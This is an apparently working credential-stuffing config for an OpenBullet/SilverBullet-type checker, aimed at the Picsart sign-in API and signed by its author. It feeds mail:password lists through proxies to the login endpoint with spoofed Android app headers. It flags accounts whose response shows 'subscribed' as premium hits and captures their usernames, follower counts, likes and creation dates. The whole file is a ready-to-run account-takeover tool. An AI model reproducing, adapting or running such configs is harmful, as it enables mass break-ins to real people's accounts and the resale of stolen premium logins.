[SETTINGS]
{
  "Name": "picsart Api",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-03-05T14:51:16.5470256+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "picsart Api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://api.picsart.com/users/signin.json" 
  CONTENT "{\"provider\":\"\",\"username\":\"<USER>\",\"password\":\"<PASS>\",\"appsflyer_id\":\"1646488808873-4093208152709365132\",\"fcm_token\":\"ecqgDtPdTa61DI9-3QxUjE:APA91bGioy8xbnEWwFgJNqfl5mvdVNLgKtEnzarwum2OqEgQCzhw2p0HrucjBMRx7rGNrm1jiCnAHxwz_U5IHPtbwPgcHWoSbcCNE9atEQXQ81VRs1HfvfeaxC_xfIb5RPaF1K8meDQr\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept-Encoding: br,gzip" 
  HEADER "device-model: G011A" 
  HEADER "app: com.picsart.studio" 
  HEADER "is-tablet: 0" 
  HEADER "Accept: application/picsart-3.0+json" 
  HEADER "Country-Code: US" 
  HEADER "experiments: b8ad:new_ranking,v8zh:original" 
  HEADER "User-Agent: PicsArt-10.x" 
  HEADER "deviceid: 235a5b173cce04de" 
  HEADER "platform: android" 
  HEADER "Language-Code: fr" 
  HEADER "auto-briteverify-token: " 
  HEADER "apk-key: 7266486dce4251fb48a8ff5fa35ddcaa" 
  HEADER "versioncode: 993819105" 
  HEADER "Host: api.picsart.com" 
  HEADER "Connection: Keep-Alive" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "subscribed\"" 
  KEYCHAIN Failure OR 
    KEY "username_or_password_incorrect" 

#username PARSE "<SOURCE>" LR "username\":\"" "\"" CreateEmpty=FALSE -> CAP "username" 

#followers_count PARSE "<SOURCE>" LR "followers_count\":" "," CreateEmpty=FALSE -> CAP "followers" 

#likes_count PARSE "<SOURCE>" LR "likes_count\":" "," CreateEmpty=FALSE -> CAP "likes_count" 

#created_at PARSE "<SOURCE>" LR "created\":\"" "T" CreateEmpty=FALSE -> CAP "created_at" 

FUNCTION Constant "Yes ✅" -> CAP "Premium" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By" 

